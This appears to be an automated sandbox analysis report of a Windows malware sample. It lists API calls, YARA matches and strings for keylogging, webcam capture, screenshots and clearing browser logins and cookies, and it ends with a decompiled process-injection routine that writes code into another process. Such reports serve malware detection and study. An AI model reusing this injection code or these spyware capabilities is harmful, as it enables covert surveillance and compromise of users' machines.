                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                          • API String ID: 834325642-3547787478
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150
                                          • SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
                                          • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
                                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
                                          • HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
                                          • SetLastError.KERNEL32(0000045A), ref: 0040F8D5
                                            • Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                          • String ID:
                                          • API String ID: 486403682-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • _free.LIBCMT ref: 0043E65B
                                          • _free.LIBCMT ref: 0043E672
                                          • _free.LIBCMT ref: 0043E691
                                          • _free.LIBCMT ref: 0043E6AC
                                          • _free.LIBCMT ref: 0043E6C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID:
                                          • API String ID: 3033488037-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
                                          • __alloca_probe_16.LIBCMT ref: 00449431
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
                                          • __freea.LIBCMT ref: 0044949D
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040A60C
                                          • [Info], xrefs: 0040A61B
                                          • [Cleared browsers logins and cookies.], xrefs: 0040A5FB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                                          • API String ID: 3472027048-899236412
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 004475E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
                                          • _free.LIBCMT ref: 0044763F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0043D8DA
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 0043D8EC
                                          • _free.LIBCMT ref: 0043D8FF
                                          • _free.LIBCMT ref: 0043D910
                                          • _free.LIBCMT ref: 0043D921
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _strpbrk.LIBCMT ref: 004469B8
                                          • _free.LIBCMT ref: 00446AD5
                                            • Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
                                            • Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
                                            • Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • CloseHandle.KERNEL32(?), ref: 00409581
                                          • UnhookWindowsHookEx.USER32 ref: 00409594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped$[Info]
                                          • API String ID: 3650414481-1913360614
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041099C
                                          Strings
                                          • http\shell\open\command, xrefs: 0041096E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: http\shell\open\command
                                          • API String ID: 3677997916-1487954565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                                          • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: GetCursorInfo$User32.dll
                                          • API String ID: 1646373207-2714051624
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                                          • GetProcAddress.KERNEL32(00000000), ref: 00401496
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetConsoleWindow$kernel32.dll
                                          • API String ID: 2574300362-100875112
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                                          • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
                                          • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
                                          • CloseHandle.KERNEL32(00000000), ref: 004176BA
                                          • CloseHandle.KERNEL32(00000000), ref: 004176C2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$FileModuleNameOpenProcess
                                          • String ID:
                                          • API String ID: 3706008839-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                                            • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Create$Stream$Compatibleclosesocket
                                          • String ID: image/jpeg
                                          • API String ID: 3038386933-3785015651
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                                          • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID: :rD
                                          • API String ID: 546120528-3120900009
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID: $vuD
                                          • API String ID: 1807457897-1530330280
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                                            • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                            • Part of subcall function 0041432B: FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                            • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                                          Strings
                                          • /sort "Visit Time" /stext ", xrefs: 004041B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFile$ChangeCreateCurrentFindHandleModuleNameNotificationProcessSleep
                                          • String ID: /sort "Visit Time" /stext "
                                          • API String ID: 1769719543-1573945896
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • UnhookWindowsHookEx.USER32(?), ref: 0040961F
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: EventHookLocalTimeUnhookWindowswsprintf
                                          • String ID: Offline Keylogger Stopped$[Info]
                                          • API String ID: 2949427887-1791908007
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: ?C$IsValidLocaleName
                                          • API String ID: 1901932003-3626571907
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: 8E@$open
                                          • API String ID: 587946157-2601783919
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: wave$CloseStop
                                          • String ID: 8E@
                                          • API String ID: 3638528417-787191786
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                                          • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                                          • SetLastError.KERNEL32(0000007F), ref: 0040F619
                                          • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000003.779727568.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: l.@$p.@$p.@$3C
                                          • API String ID: 0-542283486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 42%
                                          			E004049E6(void* __eflags, intOrPtr _a4, void* _a8, long _a12) {
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				long _v28;
                                          				long _v32;
                                          				long _v36;
                                          				long _v48;
                                          				void* _v52;
                                          				void* _v56;
                                          				_Unknown_base(*)()* _v188;
                                          				_Unknown_base(*)()* _v192;
                                          				void _v196;
                                          				void _v200;
                                          				long _v204;
                                          				void _v356;
                                          				void _v360;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t78;
                                          				void* _t80;
                                          				_Unknown_base(*)()* _t85;
                                          				_Unknown_base(*)()* _t87;
                                          				_Unknown_base(*)()* _t89;
                                          				_Unknown_base(*)()* _t91;
                                          				void* _t96;
                                          				void* _t97;
                                          				long _t119;
                                          				void* _t121;
                                          				struct HINSTANCE__* _t124;
                                          				long _t126;
                                          				void* _t129;
                                          				void* _t137;
                                          
                                          				_v28 = 0;
                                          				_t78 = E004043E4(); // executed
                                          				if(_t78 != 0) {
                                          					_t80 = OpenProcess(0x1f0fff, 0, _t78);
                                          					_v12 = _t80;
                                          					if(_t80 != 0) {
                                          						_v200 = 0;
                                          						memset( &_v196, 0, 0x9c);
                                          						_v16 = 0;
                                          						_t124 = GetModuleHandleA("kernel32.dll");
                                          						0x411ba1( &_v16);
                                          						_push("GetModuleHandleA");
                                          						_push(_t124);
                                          						if(_v16 == 0) {
                                          							_t85 = GetProcAddress();
                                          						} else {
                                          							_t85 = _v16();
                                          						}
                                          						_v200 = _t85;
                                          						0x411ba1( &_v16);
                                          						_push("GetProcAddress");
                                          						_push(_t124);
                                          						if(_v16 == 0) {
                                          							_t87 = GetProcAddress();
                                          						} else {
                                          							_t87 = _v16();
                                          						}
                                          						_v196 = _t87;
                                          						0x411ba1( &_v16);
                                          						_push("WriteProcessMemory");
                                          						_push(_t124);
                                          						if(_v16 == 0) {
                                          							_t89 = GetProcAddress();
                                          						} else {
                                          							_t89 = _v16();
                                          						}
                                          						_v192 = _t89;
                                          						0x411ba1( &_v16);
                                          						_push("LocalFree");
                                          						_push(_t124);
                                          						if(_v16 == 0) {
                                          							_t91 = GetProcAddress();
                                          						} else {
                                          							_t91 = _v16();
                                          						}
                                          						_v188 = _t91;
                                          						_v20 = VirtualAllocEx(_v12, 0, 0xa0, 0x1000, 4);
                                          						_v24 = VirtualAllocEx(_v12, 0, 0x400, 0x1000, 0x40);
                                          						_t96 = VirtualAllocEx(_v12, 0, _a12 + _a12, 0x1000, 4);
                                          						_t126 = _a12;
                                          						_v52 = _t96;
                                          						_t97 = VirtualAllocEx(_v12, 0, _t126, 0x1000, 4);
                                          						_v56 = _t97;
                                          						_v48 = _t126;
                                          						if(_v20 != 0 && _v24 != 0 && _v52 != 0 && _t126 != 0) {
                                          							WriteProcessMemory(_v12, _t97, _a8, _t126, 0);
                                          							E0040496D( &_v200, _a4);
                                          							WriteProcessMemory(_v12, _v24, E00404185, 0x400, 0);
                                          							WriteProcessMemory(_v12, _v20,  &_v200, 0xa0, 0);
                                          							_a12 = 0;
                                          							_v36 = 0;
                                          							_v32 = 0;
                                          							0x411fc6(_v12, _v24, _v20,  &_a12);
                                          							_t137 =  &_v36;
                                          							E004044DE(_t137);
                                          							ResumeThread(_t137);
                                          							WaitForSingleObject(_t137, 0x3a98);
                                          							CloseHandle(_t137);
                                          							_v360 = 0;
                                          							memset( &_v356, 0, 0x9c);
                                          							ReadProcessMemory(_v12, _v20,  &_v360, 0xa0, 0);
                                          							_t119 = _v204;
                                          							if(_t119 - 1 <= 0xffffe) {
                                          								_t121 = _t119 + 0x10;
                                          								0x413d5c(_t121);
                                          								_t129 = _t121;
                                          								if(ReadProcessMemory(_v12, _v52, _t129, _v204, 0) != 0) {
                                          									_v28 = E00404915(_t129, _v204, _a4);
                                          								}
                                          								0x413d56(_t129);
                                          							}
                                          							if(_v36 != 0) {
                                          								FreeLibrary(_v36);
                                          							}
                                          						}
                                          						VirtualFreeEx(_v12, _v20, 0, 0x8000);
                                          						VirtualFreeEx(_v12, _v24, 0, 0x8000);
                                          						VirtualFreeEx(_v12, _v52, 0, 0x8000);
                                          						VirtualFreeEx(_v12, _v56, 0, 0x8000);
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				return _v28;
                                          			}

                                          APIs
                                            • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
                                            • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
                                            • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
                                            • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
                                          • memset.MSVCRT ref: 00404A2F
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
                                            • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                            • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                            • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                            • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                            • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
                                            • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
                                          • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
                                          • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
                                            • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
                                            • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                            • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                            • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
                                            • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                            • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
                                          • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
                                          • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
                                          • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
